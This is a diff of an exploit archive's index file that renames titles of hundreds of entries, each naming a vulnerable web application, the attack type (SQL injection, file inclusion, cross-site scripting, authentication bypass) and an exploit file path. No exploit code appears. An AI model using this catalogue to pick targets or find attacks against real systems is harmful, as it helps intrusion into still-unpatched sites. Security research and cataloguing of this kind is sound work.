-9452,platforms/php/webapps/9452.pl,"Arcadem Pro 2.8 - 'article' Parameter Blind SQL Injection",2009-08-18,Mr.SQL,php,webapps,0 +9451,platforms/php/webapps/9451.txt,"DreamPics Builder - 'exhibition_id' SQL Injection",2009-08-18,Mr.SQL,php,webapps,0 +9452,platforms/php/webapps/9452.pl,"Arcadem Pro 2.8 - 'article' Blind SQL Injection",2009-08-18,Mr.SQL,php,webapps,0 9453,platforms/php/webapps/9453.txt,"Videos Broadcast Yourself 2 - 'UploadID' SQL Injection",2009-08-18,Mr.SQL,php,webapps,0 9459,platforms/php/webapps/9459.txt,"2WIRE Gateway - Authentication Bypass / Password Reset (2)",2009-08-18,bugz,php,webapps,0 9460,platforms/php/webapps/9460.txt,"autonomous lan party 0.98.3 - Remote File Inclusion",2009-08-18,cr4wl3r,php,webapps,0 @@ -22259,7 +22260,7 @@ id,file,description,date,author,platform,type,port 9491,platforms/php/webapps/9491.txt,"Dow Group - 'new.php' SQL Injection",2009-11-16,ProF.Code,php,webapps,0 9493,platforms/php/webapps/9493.txt,"Uebimiau Webmail 3.2.0-2.0 - Arbitrary Database Disclosure",2009-08-24,Septemb0x,php,webapps,0 9494,platforms/php/webapps/9494.txt,"humanCMS - Authentication Bypass",2009-08-24,next,php,webapps,0 -9497,platforms/php/webapps/9497.pl,"ITechBids 8.0 - 'ProductID' Parameter Blind SQL Injection",2009-08-24,Mr.SQL,php,webapps,0 +9497,platforms/php/webapps/9497.pl,"ITechBids 8.0 - 'ProductID' Blind SQL Injection",2009-08-24,Mr.SQL,php,webapps,0 9499,platforms/php/webapps/9499.txt,"New5starRating 1.0 - 'rating.php' SQL Injection",2009-08-24,Bgh7,php,webapps,0 9502,platforms/php/webapps/9502.txt,"Joomla! Component com_ninjamonial 1.1 - (testimID) SQL Injection",2009-08-24,"Chip d3 bi0s",php,webapps,0 9504,platforms/php/webapps/9504.txt,"Joomla! Component com_jtips 1.0.x - (season) Blind SQL Injection",2009-08-24,"Chip d3 bi0s",php,webapps,0 @@ -22269,11 +22270,11 @@ id,file,description,date,author,platform,type,port 9512,platforms/php/webapps/9512.txt,"TCPDB 3.8 - Remote Content Change Bypass",2009-08-25,Securitylab.ir,php,webapps,0 40383,platforms/asp/webapps/40383.txt,"Cisco EPC 3925 - Multiple Vulnerabilities",2016-09-15,"Patryk Bogdan",asp,webapps,80 9518,platforms/php/webapps/9518.txt,"EMO Breader Manager - 'video.php movie' SQL Injection",2009-08-25,Mr.SQL,php,webapps,0 -9522,platforms/php/webapps/9522.txt,"Moa Gallery 1.2.0 - Multiple Remote File Inclusion",2009-08-26,cr4wl3r,php,webapps,0 +9522,platforms/php/webapps/9522.txt,"Moa Gallery 1.2.0 - Multiple Remote File Inclusions",2009-08-26,cr4wl3r,php,webapps,0 9523,platforms/php/webapps/9523.txt,"Moa Gallery 1.2.0 - 'index.php action' SQL Injection",2009-08-26,Mr.SQL,php,webapps,0 9524,platforms/php/webapps/9524.txt,"totalcalendar 2.4 - Blind SQL Injection / Local File Inclusion",2009-08-26,Moudi,php,webapps,0 9525,platforms/php/webapps/9525.txt,"Moa Gallery 1.2.0 - (p_filename) Remote File Disclosure",2009-08-26,GoLd_M,php,webapps,0 -9527,platforms/php/webapps/9527.txt,"Simple CMS Framework 1.0 - 'page' Parameter SQL Injection",2009-08-26,Red-D3v1L,php,webapps,0 +9527,platforms/php/webapps/9527.txt,"Simple CMS Framework 1.0 - 'page' SQL Injection",2009-08-26,Red-D3v1L,php,webapps,0 9529,platforms/php/webapps/9529.txt,"Discuz! Plugin Crazy Star 2.0 - (fmid) SQL Injection",2009-08-26,ZhaoHuAn,php,webapps,0 9530,platforms/php/webapps/9530.txt,"Open Auto Classifieds 1.5.9 - Multiple Vulnerabilities",2009-08-26,"Andrew Horton",php,webapps,0 9531,platforms/php/webapps/9531.txt,"PAD Site Scripts 3.6 - 'list.php string' SQL Injection",2009-08-26,Mr.SQL,php,webapps,0 @@ -22284,7 +22285,7 @@ id,file,description,date,author,platform,type,port 9538,platforms/php/webapps/9538.txt,"Silurus Classifieds System - 'category.php' SQL Injection",2009-08-28,Mr.SQL,php,webapps,0 9544,platforms/php/webapps/9544.txt,"Modern Script 5.0 - 'index.php s' SQL Injection",2009-08-31,Red-D3v1L,php,webapps,0 9552,platforms/php/webapps/9552.txt,"Re-Script 0.99 Beta - 'listings.php op' SQL Injection",2009-08-31,Mr.SQL,php,webapps,0 -9553,platforms/php/webapps/9553.txt,"Rock Band CMS 0.10 - 'news.php' Multiple SQL Injection (1)",2009-08-31,Affix,php,webapps,0 +9553,platforms/php/webapps/9553.txt,"Rock Band CMS 0.10 - 'news.php' Multiple SQL Injections (1)",2009-08-31,Affix,php,webapps,0 9555,platforms/php/webapps/9555.txt,"Mybuxscript PTC-BUX - 'spnews.php' SQL Injection",2009-08-31,HxH,php,webapps,0 9556,platforms/php/webapps/9556.php,"osCommerce Online Merchant 2.2 RC2a - Code Execution",2009-08-31,flyh4t,php,webapps,0 9562,platforms/asp/webapps/9562.txt,"JSFTemplating / Mojarra Scales / GlassFish - File Disclosure",2009-09-01,"SEC Consult",asp,webapps,0 @@ -22298,9 +22299,9 @@ id,file,description,date,author,platform,type,port 9572,platforms/php/webapps/9572.txt,"DataLife Engine 8.2 - dle_config_api Remote File Inclusion",2009-09-01,Kurd-Team,php,webapps,0 9576,platforms/php/webapps/9576.txt,"Discuz! Plugin JiangHu 1.1 - 'id' SQL Injection",2009-09-02,ZhaoHuAn,php,webapps,0 9577,platforms/php/webapps/9577.txt,"Ve-EDIT 0.1.4 - (highlighter) Remote File Inclusion",2009-09-02,RoMaNcYxHaCkEr,php,webapps,0 -9578,platforms/php/webapps/9578.txt,"PHP Live! 3.3 - 'deptid' Parameter SQL Injection",2009-09-02,v3n0m,php,webapps,0 -9582,platforms/php/webapps/9582.txt,"FreeSchool 1.1.0 - Multiple Remote File Inclusion",2009-09-03,cr4wl3r,php,webapps,0 -9583,platforms/php/webapps/9583.txt,"PHPope 1.0.0 - Multiple Remote File Inclusion",2009-09-03,cr4wl3r,php,webapps,0 +9578,platforms/php/webapps/9578.txt,"PHP Live! 3.3 - 'deptid' SQL Injection",2009-09-02,v3n0m,php,webapps,0 +9582,platforms/php/webapps/9582.txt,"FreeSchool 1.1.0 - Multiple Remote File Inclusions",2009-09-03,cr4wl3r,php,webapps,0 +9583,platforms/php/webapps/9583.txt,"PHPope 1.0.0 - Multiple Remote File Inclusions",2009-09-03,cr4wl3r,php,webapps,0 9588,platforms/php/webapps/9588.txt,"Mambo Component com_zoom - 'catid' Blind SQL Injection",2009-09-04,boom3rang,php,webapps,0 9590,platforms/php/webapps/9590.c,"ZeroBoard 4.1 pl7 - 'now_connect()' Remote Code Execution",2009-09-04,SpeeDr00t,php,webapps,0 9591,platforms/php/webapps/9591.txt,"Ticket Support Script - 'ticket.php' Arbitrary File Upload",2009-09-04,InjEctOr5,php,webapps,0 @@ -22310,12 +22311,12 @@ id,file,description,date,author,platform,type,port 9601,platforms/php/webapps/9601.php,"Joomla! Component BF Survey Pro Free - SQL Injection",2009-09-09,jdc,php,webapps,0 9602,platforms/php/webapps/9602.pl,"Joomla! Component TPDugg 1.1 - Blind SQL Injection",2009-09-09,NoGe,php,webapps,0 9603,platforms/php/webapps/9603.txt,"Model Agency Manager Pro - (user_id) SQL Injection",2009-09-09,R3d-D3V!L,php,webapps,0 -9604,platforms/php/webapps/9604.txt,"Joomla! Component Joomloc 1.0 - 'id' Parameter SQL Injection",2009-09-09,"Chip d3 bi0s",php,webapps,0 +9604,platforms/php/webapps/9604.txt,"Joomla! Component Joomloc 1.0 - 'id' SQL Injection",2009-09-09,"Chip d3 bi0s",php,webapps,0 9605,platforms/php/webapps/9605.pl,"Agoko CMS 0.4 - Remote Command Execution",2009-09-09,StAkeR,php,webapps,0 9609,platforms/php/webapps/9609.txt,"Mambo Component Hestar - SQL Injection",2009-09-09,M3NW5,php,webapps,0 9611,platforms/php/webapps/9611.txt,"PHPNagios 1.2.0 - 'menu.php' Local File Inclusion",2009-09-09,CoBRa_21,php,webapps,0 -9612,platforms/asp/webapps/9612.txt,"ChartDirector 5.0.1 - 'cacheId' Parameter Arbitrary File Disclosure",2009-09-09,DokFLeed,asp,webapps,0 -9623,platforms/php/webapps/9623.txt,"Advanced Comment System 1.0 - Multiple Remote File Inclusion",2009-09-10,Kurd-Team,php,webapps,0 +9612,platforms/asp/webapps/9612.txt,"ChartDirector 5.0.1 - 'cacheId' Arbitrary File Disclosure",2009-09-09,DokFLeed,asp,webapps,0 +9623,platforms/php/webapps/9623.txt,"Advanced Comment System 1.0 - Multiple Remote File Inclusions",2009-09-10,Kurd-Team,php,webapps,0 9625,platforms/php/webapps/9625.txt,"nullam blog 0.1.2 - Local File Inclusion / File Disclosure / SQL Injection / Cross-Site Scripting",2009-09-10,"Salvatore Fresta",php,webapps,0 9629,platforms/php/webapps/9629.txt,"Graffiti CMS 1.x - Arbitrary File Upload",2009-09-10,"Alexander Concha",php,webapps,0 9630,platforms/php/webapps/9630.txt,"MYRE Holiday Rental Manager - 'action' SQL Injection",2009-09-10,Mr.SQL,php,webapps,0 @@ -22349,7 +22350,7 @@ id,file,description,date,author,platform,type,port 9703,platforms/php/webapps/9703.txt,"phpPollScript 1.3 - (include_class) Remote File Inclusion",2009-09-16,cr4wl3r,php,webapps,0 9706,platforms/php/webapps/9706.txt,"Joomla! Component com_album 1.14 - Directory Traversal",2009-09-17,DreamTurk,php,webapps,0 9708,platforms/php/webapps/9708.txt,"OpenSiteAdmin 0.9.7b - 'pageHeader.php path' Remote File Inclusion",2009-09-17,"EA Ngel",php,webapps,0 -9710,platforms/php/webapps/9710.txt,"CF Shopkart 5.3x - 'itemID' Parameter SQL Injection",2009-09-17,"learn3r hacker",php,webapps,0 +9710,platforms/php/webapps/9710.txt,"CF Shopkart 5.3x - 'itemID' SQL Injection",2009-09-17,"learn3r hacker",php,webapps,0 9711,platforms/php/webapps/9711.txt,"FMyClone 2.3 - Multiple SQL Injections",2009-09-17,"learn3r hacker",php,webapps,0 9712,platforms/php/webapps/9712.txt,"Nephp Publisher Enterprise 4.5 - Authentication Bypass",2009-09-17,"learn3r hacker",php,webapps,0 9713,platforms/php/webapps/9713.pl,"Joomla! Component com_jreservation 1.5 - 'pid' Blind SQL Injection",2009-09-17,"Chip d3 bi0s",php,webapps,0 @@ -22357,15 +22358,15 @@ id,file,description,date,author,platform,type,port 9715,platforms/multiple/webapps/9715.txt,"Zainu 1.0 - SQL Injection",2009-09-18,snakespc,multiple,webapps,0 9716,platforms/multiple/webapps/9716.txt,"Network Management/Inventory System - 'header.php' Remote File Inclusion",2009-09-18,"EA Ngel",multiple,webapps,0 9719,platforms/multiple/webapps/9719.txt,"FanUpdate 2.2.1 - show-cat.php SQL Injection",2009-09-18,"(In)Security Romania",multiple,webapps,0 -9720,platforms/multiple/webapps/9720.txt,"FSphp 0.2.1 - Multiple Remote File Inclusion",2009-09-18,NoGe,multiple,webapps,0 +9720,platforms/multiple/webapps/9720.txt,"FSphp 0.2.1 - Multiple Remote File Inclusions",2009-09-18,NoGe,multiple,webapps,0 9721,platforms/multiple/webapps/9721.txt,"Joomla! Component com_surveymanager 1.5.0 - SQL Injection (stype)",2009-09-21,kaMtiEz,multiple,webapps,0 -9722,platforms/multiple/webapps/9722.txt,"DDL CMS 1.0 - Multiple Remote File Inclusion",2009-09-21,HxH,multiple,webapps,0 +9722,platforms/multiple/webapps/9722.txt,"DDL CMS 1.0 - Multiple Remote File Inclusions",2009-09-21,HxH,multiple,webapps,0 9723,platforms/multiple/webapps/9723.txt,"Joomla! Component com_jbudgetsmagic 0.3.2 < 0.4.0 - 'bid' SQL Injection",2009-09-21,kaMtiEz,multiple,webapps,0 -9724,platforms/multiple/webapps/9724.txt,"BAnner ROtation System mini - Multiple Remote File Inclusion",2009-09-21,"EA Ngel",multiple,webapps,0 +9724,platforms/multiple/webapps/9724.txt,"BAnner ROtation System mini - Multiple Remote File Inclusions",2009-09-21,"EA Ngel",multiple,webapps,0 9726,platforms/multiple/webapps/9726.py,"cP Creator 2.7.1 - SQL Injection",2009-09-21,"Sina Yazdanmehr",multiple,webapps,0 9727,platforms/multiple/webapps/9727.txt,"CMScontrol (Content Management Portal Solutions) - SQL Injection",2009-09-21,ph1l1ster,multiple,webapps,0 9728,platforms/multiple/webapps/9728.txt,"ProdLer 2.0 - Remote File Inclusion",2009-09-21,cr4wl3r,multiple,webapps,0 -9729,platforms/multiple/webapps/9729.txt,"Loggix Project 9.4.5 - Multiple Remote File Inclusion",2009-09-21,cr4wl3r,multiple,webapps,0 +9729,platforms/multiple/webapps/9729.txt,"Loggix Project 9.4.5 - Multiple Remote File Inclusions",2009-09-21,cr4wl3r,multiple,webapps,0 9730,platforms/multiple/webapps/9730.txt,"WX Guestbook 1.1.208 - SQL Injection / Persistent Cross-Site Scripting",2009-09-21,learn3r,multiple,webapps,0 9732,platforms/multiple/webapps/9732.txt,"Joomla! Component com_jinc 0.2 - (newsid) Blind SQL Injection",2009-09-21,"Chip d3 bi0s",multiple,webapps,0 9733,platforms/multiple/webapps/9733.pl,"Joomla! Component com_mytube (user_id) 1.0 Beta - Blind SQL Injection",2009-09-21,"Chip d3 bi0s",multiple,webapps,0 @@ -22446,8 +22447,8 @@ id,file,description,date,author,platform,type,port 10003,platforms/php/webapps/10003.txt,"Docebo 3.6.0.3 - Multiple SQL Injections",2009-10-09,"Andrea Fabrizi",php,webapps,0 10006,platforms/php/webapps/10006.txt,"DreamPoll 3.1 - Exploit",2009-10-08,"Mark from infosecstuff",php,webapps,0 10012,platforms/multiple/webapps/10012.py,"html2ps - 'include file' Server-Side Include Directive Directory Traversal",2009-09-25,epiphant,multiple,webapps,0 -10013,platforms/jsp/webapps/10013.txt,"Hyperic HQ 3.2 < 4.2-beta1 - Multiple Cross-Site Scripting",2009-10-02,CoreLabs,jsp,webapps,0 -10016,platforms/php/webapps/10016.pl,"Joomla! Component JForJoomla! Jreservation 1.5 - 'pid' Parameter SQL Injection",2009-11-10,"Chip d3 bi0s",php,webapps,0 +10013,platforms/jsp/webapps/10013.txt,"Hyperic HQ 3.2 < 4.2-beta1 - Multiple Cross-Site Scripting Vulnerabilities",2009-10-02,CoreLabs,jsp,webapps,0 +10016,platforms/php/webapps/10016.pl,"Joomla! Component JForJoomla! Jreservation 1.5 - 'pid' SQL Injection",2009-11-10,"Chip d3 bi0s",php,webapps,0 10031,platforms/cgi/webapps/10031.rb,"Alcatel-Lucent OmniPCX Enterprise Communication Server 7.1 - masterCGI Command Injection (Metasploit)",2007-09-17,patrick,cgi,webapps,443 10042,platforms/php/webapps/10042.txt,"Achievo 1.3.4 - SQL Injection",2009-10-14,"Ryan Dewhurst",php,webapps,0 10043,platforms/php/webapps/10043.txt,"redcat media - SQL Injection",2009-10-02,s4va,php,webapps,0 @@ -22466,14 +22467,14 @@ id,file,description,date,author,platform,type,port 10069,platforms/php/webapps/10069.php,"Empire CMS 47 - SQL Injection",2009-10-05,"Securitylab Security Research",php,webapps,0 10074,platforms/novell/webapps/10074.txt,"Novell eDirectory 8.8 SP5 - 'dconserv.dlm' Cross-Site Scripting",2009-10-01,"Francis Provencher",novell,webapps,8030 10075,platforms/novell/webapps/10075.txt,"Novell Edirectory 8.8 SP5 - Cross-Site Scripting",2009-09-23,"Francis Provencher",novell,webapps,8030 -33477,platforms/php/webapps/33477.txt,"Calendarix 0.7 - 'calpath' Parameter Remote File Inclusion",2010-01-07,Saywhat,php,webapps,0 +33477,platforms/php/webapps/33477.txt,"Calendarix 0.7 - 'calpath' Remote File Inclusion",2010-01-07,Saywhat,php,webapps,0 33428,platforms/windows/webapps/33428.py,"SafeNet Sentinel Protection Server 7.0 < 7.4 / Sentinel Keys Server 1.0.3 < 1.0.4 - Directory Traversal",2014-05-19,"Matt Schmidt",windows,webapps,7002 10082,platforms/php/webapps/10082.txt,"PBBoard 2.0.2 - Full Path Disclosure",2009-10-06,rUnViRuS,php,webapps,0 10085,platforms/jsp/webapps/10085.txt,"toutvirtual virtualiq pro 3.2 - Multiple Vulnerabilities",2009-11-07,"Alberto Trivero",jsp,webapps,0 10088,platforms/php/webapps/10088.txt,"WordPress 2.0 < 2.7.1 - 'admin.php' Module Configuration Security Bypass",2009-11-10,"Fernando Arnaboldi",php,webapps,0 10089,platforms/php/webapps/10089.txt,"WordPress < 2.8.5 - Unrestricted Arbitrary File Upload / Arbitrary PHP Code Execution",2009-11-11,"Dawid Golunski",php,webapps,0 10090,platforms/php/webapps/10090.txt,"WordPress MU 1.2.2 < 1.3.1 - 'wp-includes/wpmu-functions.php' Cross-Site Scripting",2009-11-10,"Juan Galiana Lara",php,webapps,0 -10094,platforms/jsp/webapps/10094.txt,"IBM Rational RequisitePro 7.10 / ReqWebHelp - Multiple Cross-Site Scripting",2009-10-15,IBM,jsp,webapps,0 +10094,platforms/jsp/webapps/10094.txt,"IBM Rational RequisitePro 7.10 / ReqWebHelp - Multiple Cross-Site Scripting Vulnerabilities",2009-10-15,IBM,jsp,webapps,0 10096,platforms/php/webapps/10096.txt,"OS Commerce 2.2r2 - Authentication Bypass",2009-11-13,"Stuart Udall",php,webapps,0 10101,platforms/php/webapps/10101.txt,"telepark wiki 2.4.23 - Multiple Vulnerabilities",2009-11-16,Abysssec,php,webapps,0 10105,platforms/php/webapps/10105.txt,"Cifshanghai - 'chanpin_info.php' CMS SQL Injection",2009-11-16,ProF.Code,php,webapps,0 @@ -22497,21 +22498,21 @@ id,file,description,date,author,platform,type,port 40304,platforms/cgi/webapps/40304.txt,"PLC Wireless Router GPN2.4P21-C-CN - Arbitrary File Disclosure",2016-08-29,"Rahul Raz",cgi,webapps,80 10214,platforms/php/webapps/10214.txt,"Joomla! Component mygallery - (farbinform_krell) SQL Injection",2009-11-23,"Manas58 BAYBORA",php,webapps,0 10216,platforms/php/webapps/10216.txt,"kr-web 1.1b2 - Remote File Inclusion",2009-11-24,cr4wl3r,php,webapps,0 -10217,platforms/php/webapps/10217.txt,"NukeHall 0.3 - Multiple Remote File Inclusion",2009-11-24,cr4wl3r,php,webapps,0 +10217,platforms/php/webapps/10217.txt,"NukeHall 0.3 - Multiple Remote File Inclusions",2009-11-24,cr4wl3r,php,webapps,0 10218,platforms/php/webapps/10218.txt,"outreach project tool 1.2.6 - Remote File Inclusion",2009-11-24,cr4wl3r,php,webapps,0 10219,platforms/php/webapps/10219.txt,"phptraverse 0.8.0 - Remote File Inclusion",2009-11-24,cr4wl3r,php,webapps,0 10220,platforms/php/webapps/10220.txt,"pointcomma 3.8b2 - Remote File Inclusion",2009-11-24,cr4wl3r,php,webapps,0 10222,platforms/php/webapps/10222.txt,"W3infotech - Authentication Bypass",2009-11-24,ViRuS_HiMa,php,webapps,0 10224,platforms/php/webapps/10224.txt,"Quick.Cart 3.4 / Quick.CMS 2.4 - Cross-Site Request Forgery",2009-11-24,"Alice Kaerast",php,webapps,0 10225,platforms/windows/webapps/10225.txt,"MDaemon WebAdmin 2.0.x - SQL Injection",2006-05-26,KOUSULIN,windows,webapps,1000 -10227,platforms/php/webapps/10227.txt,"Joomla! Component com_mygallery - 'cid' Parameter SQL Injection",2009-11-25,S@BUN,php,webapps,0 +10227,platforms/php/webapps/10227.txt,"Joomla! Component com_mygallery - 'cid' SQL Injection",2009-11-25,S@BUN,php,webapps,0 10228,platforms/php/webapps/10228.txt,"WordPress Plugin WP-Cumulus 1.20 - Exploit",2009-11-25,MustLive,php,webapps,0 10230,platforms/php/webapps/10230.txt,"Fake Hit Generator 2.2 - Arbitrary File Upload",2009-11-25,DigitALL,php,webapps,0 10231,platforms/php/webapps/10231.txt,"Radio istek scripti 2.5 - Remote Configuration Disclosure",2009-11-25,"kurdish hackers team",php,webapps,0 10232,platforms/php/webapps/10232.txt,"Joomla! Component com_gcalendar 1.1.2 - (gcid) SQL Injection",2009-11-25,"Yogyacarderlink Crew",php,webapps,0 10233,platforms/php/webapps/10233.txt,"phpBazar-2.1.1fix - Remote Administration-Panel",2009-11-25,"kurdish hackers team",php,webapps,0 10234,platforms/php/webapps/10234.txt,"Cacti 0.8.7e - Multiple Vulnerabilities",2009-11-26,"Moritz Naumann",php,webapps,0 -10236,platforms/php/webapps/10236.txt,"Flashden - Multiple Arbitrary File Upload",2009-11-26,DigitALL,php,webapps,0 +10236,platforms/php/webapps/10236.txt,"Flashden - Multiple Arbitrary File Uploads",2009-11-26,DigitALL,php,webapps,0 10238,platforms/php/webapps/10238.txt,"Joomla! Component com_lyftenbloggie 1.04 - SQL Injection",2009-11-28,kaMtiEz,php,webapps,0 10241,platforms/php/webapps/10241.txt,"Uploaderr 1.0 File Hosting Script - Arbitrary File Upload",2009-11-28,DigitALL,php,webapps,0 10245,platforms/php/webapps/10245.txt,"phpBazar 2.1.1fix - 'cid' SQL Injection",2009-11-28,MizoZ,php,webapps,0 @@ -22530,14 +22531,14 @@ id,file,description,date,author,platform,type,port 10262,platforms/linux/webapps/10262.txt,"ISPworker 1.23 - Remote File Disclosure",2009-12-01,cr4wl3r,linux,webapps,80 10263,platforms/linux/webapps/10263.txt,"Quate CMS 0.3.5 - Local/Remote File Inclusion",2009-12-01,cr4wl3r,linux,webapps,80 10272,platforms/php/webapps/10272.txt,"Joomla! Component Joaktree 1.0 - SQL Injection",2009-12-01,"Don Tukulesto",php,webapps,0 -10273,platforms/php/webapps/10273.txt,"Joomla! Component MojoBlog 0.15 - Multiple Remote File Inclusion",2009-12-01,kaMtiEz,php,webapps,0 +10273,platforms/php/webapps/10273.txt,"Joomla! Component MojoBlog 0.15 - Multiple Remote File Inclusions",2009-12-01,kaMtiEz,php,webapps,0 10274,platforms/php/webapps/10274.txt,"Simple Machines Forum (SMF) 1.1.10/2.0 RC2 - Multiple Vulnerabilities",2009-12-02,"SimpleAudit Team",php,webapps,0 10275,platforms/php/webapps/10275.txt,"Kide Shoutbox 0.4.6 - Cross-Site Scripting / AXFR",2009-12-02,andresg888,php,webapps,0 10276,platforms/hardware/webapps/10276.txt,"Huawei MT882 Modem/Router - Multiple Vulnerabilities",2009-12-03,DecodeX01,hardware,webapps,0 -10277,platforms/php/webapps/10277.txt,"Thatware 0.5.3 - Multiple Remote File Inclusion",2009-12-03,cr4wl3r,php,webapps,0 +10277,platforms/php/webapps/10277.txt,"Thatware 0.5.3 - Multiple Remote File Inclusions",2009-12-03,cr4wl3r,php,webapps,0 10284,platforms/php/webapps/10284.txt,"ita-forum 5.1.32 - SQL Injection",2009-11-30,BAYBORA,php,webapps,0 10285,platforms/php/webapps/10285.txt,"Public Media Manager - Exploit",2009-12-01,cr4wl3r,php,webapps,0 -10286,platforms/php/webapps/10286.txt,"OpenCSP - Multiple Remote File Inclusion",2009-11-25,EANgel,php,webapps,0 +10286,platforms/php/webapps/10286.txt,"OpenCSP - Multiple Remote File Inclusions",2009-11-25,EANgel,php,webapps,0 10287,platforms/php/webapps/10287.txt,"MundiMail 0.8.2 - Remote Code Execution",2009-09-07,Dedalo,php,webapps,0 10288,platforms/php/webapps/10288.txt,"SAPID SHOP 1.3 - Remote File Inclusion",2009-12-03,cr4wl3r,php,webapps,0 10289,platforms/php/webapps/10289.txt,"Power BB 1.8.3 - Remote File Inclusions",2009-11-25,DigitALL,php,webapps,0 @@ -22550,9 +22551,9 @@ id,file,description,date,author,platform,type,port 10299,platforms/php/webapps/10299.txt,"GeN3 forum 1.3 - SQL Injection",2009-12-04,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 10302,platforms/php/webapps/10302.txt,"427BB 2.3.2 - SQL Injection",2009-12-04,cr4wl3r,php,webapps,0 10304,platforms/php/webapps/10304.txt,"Invision Power Board 2.3.6/3.0.4 - Local File Inclusion / SQL Injection",2009-12-04,"Dawid Golunski",php,webapps,0 -10305,platforms/php/webapps/10305.txt,"UBBCentral UBB.Threads 7.5.4 2 - Multiple File Inclusion",2009-12-04,R3VAN_BASTARD,php,webapps,0 +10305,platforms/php/webapps/10305.txt,"UBBCentral UBB.Threads 7.5.4 2 - Multiple File Inclusions",2009-12-04,R3VAN_BASTARD,php,webapps,0 10306,platforms/php/webapps/10306.txt,"Achievo 1.4.2 - Arbitrary File Upload",2009-12-04,"Nahuel Grisolia",php,webapps,0 -10307,platforms/php/webapps/10307.txt,"Achievo 1.4.2 - Permanent Cross-Site Scripting",2009-12-04,"Nahuel Grisolia",php,webapps,0 +10307,platforms/php/webapps/10307.txt,"Achievo 1.4.2 - Persistent Cross-Site Scripting",2009-12-04,"Nahuel Grisolia",php,webapps,0 10312,platforms/php/webapps/10312.php,"Joomla! Component com_joomgallery 1.5.x - &func Incorrect Flood Filter",2009-12-04,Jbyte,php,webapps,0 10314,platforms/php/webapps/10314.txt,"BM Classifieds Ads - SQL Injection",2009-12-04,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 10318,platforms/php/webapps/10318.txt,"Joomla! Component yt_color YOOOtheme - Cross-Site Scripting / Cookie Stealing",2009-12-04,andresg888,php,webapps,80 @@ -22562,7 +22563,7 @@ id,file,description,date,author,platform,type,port 10330,platforms/php/webapps/10330.txt,"Elkagroup - SQL Injection",2009-12-06,SadHaCkEr,php,webapps,0 10331,platforms/windows/webapps/10331.txt,"iWeb HTTP Server - Directory Traversal",2009-12-06,mr_me,windows,webapps,0 10337,platforms/php/webapps/10337.txt,"Chipmunk NewsLetter - Persistent Cross-Site Scripting",2009-12-07,mr_me,php,webapps,0 -10341,platforms/php/webapps/10341.txt,"SiSplet CMS 2008-01-24 - Multiple Remote File Inclusion",2009-12-07,cr4wl3r,php,webapps,0 +10341,platforms/php/webapps/10341.txt,"SiSplet CMS 2008-01-24 - Multiple Remote File Inclusions",2009-12-07,cr4wl3r,php,webapps,0 10347,platforms/hardware/webapps/10347.txt,"Barracuda IMFirewall 620 - Exploit",2009-12-07,Global-Evolution,hardware,webapps,0 10350,platforms/php/webapps/10350.txt,"IRAN N.E.T E-Commerce Group - SQL Injection",2009-12-08,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 10351,platforms/php/webapps/10351.txt,"MarieCMS 0.9 - Local File Inclusion / Remote File Inclusion / Cross-Site Scripting",2009-12-07,"Amol Naik",php,webapps,0 @@ -22583,7 +22584,7 @@ id,file,description,date,author,platform,type,port 10379,platforms/php/webapps/10379.txt,"oBlog - Persistent Cross-Site Scripting / Cross-Site Request Forgery / Admin Brute Force",2009-12-11,"Milos Zivanovic",php,webapps,0 10383,platforms/php/webapps/10383.txt,"Digital Scribe 1.4.1 - Multiple SQL Injections",2009-12-11,"Salvatore Fresta",php,webapps,0 10384,platforms/php/webapps/10384.txt,"E-Store - SQL Injection",2009-12-11,"Salvatore Fresta",php,webapps,0 -10386,platforms/solaris/webapps/10386.txt,"Sun Solaris AnswerBook2 - Multiple Cross-Site Scripting",2005-05-07,"Thomas Liam Romanis",solaris,webapps,0 +10386,platforms/solaris/webapps/10386.txt,"Sun Solaris AnswerBook2 - Multiple Cross-Site Scripting Vulnerabilities",2005-05-07,"Thomas Liam Romanis",solaris,webapps,0 10388,platforms/php/webapps/10388.txt,"Chipmunk NewsLetter - Cross-Site Request Forgery",2009-12-11,"Milos Zivanovic",php,webapps,0 10389,platforms/php/webapps/10389.txt,"Illogator Shop - SQL Injection Bypass",2009-12-11,bi0,php,webapps,0 10390,platforms/php/webapps/10390.txt,"phpCollegeExchange 0.1.5c - Multiple SQL Injections",2009-12-11,"Salvatore Fresta",php,webapps,0 @@ -22605,7 +22606,7 @@ id,file,description,date,author,platform,type,port 10418,platforms/php/webapps/10418.txt,"Ele Medios CMS - SQL Injection",2009-12-13,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 10419,platforms/php/webapps/10419.txt,"Chipmunk Board Script 1.x - Multiple Cross-Site Request Forgery Vulnerabilities",2009-12-13,"Milos Zivanovic",php,webapps,0 10420,platforms/php/webapps/10420.txt,"Ez Guestbook 1.0 - Multiple Vulnerabilities",2009-12-14,"Milos Zivanovic",php,webapps,0 -10421,platforms/php/webapps/10421.txt,"Automne.ws CMS 4.0.0rc2 - Multiple Remote File Inclusion",2009-12-14,"1nd0n3s14n l4m3r",php,webapps,0 +10421,platforms/php/webapps/10421.txt,"Automne.ws CMS 4.0.0rc2 - Multiple Remote File Inclusions",2009-12-14,"1nd0n3s14n l4m3r",php,webapps,0 10422,platforms/php/webapps/10422.txt,"eoCMS 0.9.03 - Remote File Inclusion",2009-12-14,"1nd0n3s14n l4m3r",php,webapps,0 10424,platforms/multiple/webapps/10424.txt,"Redmine 0.8.6 - Cross-Site Request Forgery (Add Admin)",2009-12-14,p0deje,multiple,webapps,0 10425,platforms/asp/webapps/10425.txt,"Quartz Concept Content Manager 3.00 - Authentication Bypass",2009-12-14,Mr.aFiR,asp,webapps,0 @@ -22665,7 +22666,7 @@ id,file,description,date,author,platform,type,port 10498,platforms/php/webapps/10498.txt,"Pre Hospital Management System - 'department.php id' SQL Injection",2009-12-16,R3d-D3V!L,php,webapps,0 10499,platforms/php/webapps/10499.txt,"eUploader PRO 3.1.1 - Cross-Site Request Forgery / Cross-Site Scripting",2009-12-16,"Milos Zivanovic",php,webapps,0 10500,platforms/php/webapps/10500.txt,"Omnistar Affiliate - Authentication Bypass",2009-12-16,R3d-D3V!L,php,webapps,0 -10501,platforms/asp/webapps/10501.txt,"Texas Rankem - 'player_id' Parameter SQL Injection",2009-12-16,R3d-D3V!L,asp,webapps,0 +10501,platforms/asp/webapps/10501.txt,"Texas Rankem - 'player_id' SQL Injection",2009-12-16,R3d-D3V!L,asp,webapps,0 10502,platforms/asp/webapps/10502.txt,"Pre Hotels&Resorts Management System - Authentication Bypass",2009-12-16,R3d-D3V!L,asp,webapps,0 